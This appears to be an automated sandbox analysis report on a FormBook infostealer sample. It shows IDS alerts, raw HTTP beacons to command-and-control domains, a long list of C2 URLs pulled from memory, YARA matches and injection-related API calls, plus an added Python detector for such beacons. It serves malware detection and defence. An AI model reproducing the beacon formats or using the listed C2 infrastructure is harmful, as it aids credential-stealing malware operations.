Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: global traffic; HTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp HTTP/1.1 | Host: www.the343radio.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP HTTP/1.1 | Host: www.registeredagentfirm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p HTTP/1.1 | Host: www.tiendazoom.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
Source: Joe Sandbox View; IP Address: 34.98.99.30
Source: Joe Sandbox View; ASN Name: IHNETUS
Source: Joe Sandbox View; ASN Name: AMAZON-AESUS
Source: Joe Sandbox View; ASN Name: GOOGLEUS
Source: unknown; DNS traffic detected: queries for: www.the343radio.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 13 Jan 2021 20:50:04 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: (315 bytes, rendered as ASCII below) | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
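Each check-in above is a GET to /jqc/ with two query parameters, a Host header, Connection: close, no User-Agent and a 7-byte NUL body, which is the traffic shape the Snort rules and the "HTTP GET or POST without a user agent" signature key on. The following is an added example, not Joe Sandbox, Snort or FormBook code, that parses raw requests and scores them against that shape plus two indicators from the decrypted strings (the template User-Agent "Mozilla Firefox/4.0" and the dat= POST field). REQUESTS is constructed: the three GETs are the ones shown above with CRLF line endings restored, the POST is built from the header template in the decrypted strings (no POST was observed in this run), and the last request is a benign control.

```python
"""Flag FormBook-style HTTP check-ins in raw requests.

Added example, not Joe Sandbox, Snort or FormBook code.  REQUESTS is
constructed: the GETs are the observed requests with CRLF restored, the POST
follows the header template in the decrypted strings (not observed here),
and the last entry is a benign control.
"""
from urllib.parse import urlsplit

C2_PATH = "/jqc/"                     # path of the decrypted CnC URL
TEMPLATE_UA = "Mozilla Firefox/4.0"   # User-Agent string among the decrypted strings

REQUESTS = [
    (b"GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSr"
     b"DbGPbei90zUxLRJiOLwAKv7MnajRyqhPp HTTP/1.1\r\nHost: www.the343radio.com\r\n"
     b"Connection: close\r\n\r\n" + b"\x00" * 7),
    (b"GET /jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1op"
     b"ataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP HTTP/1.1\r\nHost: www.registeredagentfirm.com"
     b"\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
    (b"GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4U"
     b"LnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p HTTP/1.1\r\nHost: www.tiendazoom.com\r\n"
     b"Connection: close\r\n\r\n" + b"\x00" * 7),
    # Constructed from the POST template strings; body content is a placeholder.
    (b"POST /jqc/ HTTP/1.1\r\nHost: www.registeredagentfirm.com\r\nConnection: close\r\n"
     b"Content-Length: 12\r\nCache-Control: no-cache\r\nOrigin: http://www.registeredagentfirm.com\r\n"
     b"User-Agent: Mozilla Firefox/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\n"
     b"Accept: */*\r\nReferer: http://www.registeredagentfirm.com/jqc/\r\nAccept-Language: en-US\r\n"
     b"Accept-Encoding: gzip, deflate\r\n\r\ndat=AAAAAAAA"),
    # Benign control request.
    (b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
     b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nAccept: */*\r\n\r\n"),
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query pairs, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    # Keep query values raw: the beacon payload is base64-like and must not be %-decoded.
    query = [p.split("=", 1) for p in url.query.split("&") if p]
    return {"method": method, "path": url.path, "query": query,
            "headers": headers, "body": body}


def check_request(raw, c2_path=C2_PATH):
    """Return the reasons a request looks like a FormBook beacon (empty if none)."""
    req = parse_request(raw)
    h = req["headers"]
    reasons = []
    if "user-agent" not in h:
        reasons.append("no User-Agent header")
    elif h["user-agent"] == TEMPLATE_UA:
        reasons.append("User-Agent equals the template string in the config")
    if req["path"] == c2_path:
        reasons.append("path equals the configured C2 path")
    if req["method"] == "GET" and req["body"]:
        reasons.append("GET request carries a body")
    if req["method"] == "GET" and len(req["query"]) == 2 and h.get("connection") == "close":
        reasons.append("two-parameter GET with Connection: close")
    if req["method"] == "POST" and req["body"].startswith(b"dat="):
        reasons.append("POST body uses the dat= field from the config")
    return reasons


def triage(requests, threshold=2):
    """Map each request line to its reasons, keeping those at or above threshold."""
    hits = {}
    for raw in requests:
        reasons = check_request(raw)
        if len(reasons) >= threshold:
            hits[raw.split(b"\r\n", 1)[0].decode("latin-1")] = reasons
    return hits


if __name__ == "__main__":
    for line, reasons in triage(REQUESTS).items():
        print(line[:60], "->", "; ".join(reasons))
```

The C2 path and the User-Agent string are sample-specific and come out of the configuration; the structural indicators (no User-Agent, a body on a GET, two-parameter query with Connection: close) are what carry over to other FormBook builds, which is why the example requires two reasons before reporting a hit rather than alerting on any single one.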
Source: explorer.exe, 0000000D.00000000.325706052.000000000F640000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.11sxsx.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.11sxsx.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.11sxsx.com/jqc/www.lhc965.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.11sxsx.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.bebywye.site
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.bebywye.site/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.bebywye.site/jqc/www.ip-freight.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.bebywye.siteReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.eaglesnestpropheticministry.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.eaglesnestpropheticministry.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.eaglesnestpropheticministry.com/jqc/www.internetmarkaching.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.eaglesnestpropheticministry.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.internetmarkaching.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.internetmarkaching.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.internetmarkaching.com/jqc/www.weddingmustgoon.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.internetmarkaching.comReferer:
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.ip-freight.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.ip-freight.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.ip-freight.com/jqc/www.toweroflifeinc.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.ip-freight.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.kenniscourtureconsignments.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.kenniscourtureconsignments.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp; String found in binary or memory: http://www.kenniscourtureconsignments.com/jqc/www.novergi.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kenniscourtureconsignments.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.com/jqc/www.topheadlinetowitness-today.info
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/M
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/www.tiendazoom.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digital
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digital/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digital/jqc/www.theorangepearl.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digitalReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/www.registeredagentfirm.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.com/jqc/www.11sxsx.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.com/jqc/www.eaglesnestpropheticministry.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.info
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.info/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.info/jqc/www.kenniscourtureconsignments.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.infoReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/www.strahlenschutz.digital
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.com/jqc/www.bebywye.site
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00419D60 NtCreateFile, 5_2_00419D60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00419E10 NtReadFile, 5_2_00419E10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00419E90 NtClose, 5_2_00419E90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00419F40 NtAllocateVirtualMemory, 5_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00419D5D NtCreateFile, 5_2_00419D5D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00419E0B NtReadFile, 5_2_00419E0B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00419E8A NtClose, 5_2_00419E8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00419F3A NtAllocateVirtualMemory, 5_2_00419F3A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018599A0 NtCreateSection,LdrInitializeThunk, 5_2_018599A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018595D0 NtClose,LdrInitializeThunk, 5_2_018595D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_01859910
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859540 NtReadFile,LdrInitializeThunk, 5_2_01859540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018598F0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_018598F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859840 NtDelayExecution,LdrInitializeThunk, 5_2_01859840
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_01859860
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859780 NtMapViewOfSection,LdrInitializeThunk, 5_2_01859780
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018597A0 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_018597A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859710 NtQueryInformationToken,LdrInitializeThunk, 5_2_01859710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018596E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_018596E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859A00 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_01859A00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859A20 NtResumeThread,LdrInitializeThunk, 5_2_01859A20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859A50 NtCreateFile,LdrInitializeThunk, 5_2_01859A50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859660 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_01859660
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018599D0 NtCreateProcessEx, 5_2_018599D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018595F0 NtQueryInformationFile, 5_2_018595F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859520 NtWaitForSingleObject, 5_2_01859520
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0185AD30 NtSetContextThread, 5_2_0185AD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859950 NtQueueApcThread, 5_2_01859950
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859560 NtWriteFile, 5_2_01859560
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018598A0 NtWriteVirtualMemory, 5_2_018598A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859820 NtEnumerateKey, 5_2_01859820
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0185B040 NtSuspendThread, 5_2_0185B040
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0185A3B0 NtGetContextThread, 5_2_0185A3B0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859FE0 NtCreateMutant, 5_2_01859FE0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859B00 NtSetValueKey, 5_2_01859B00
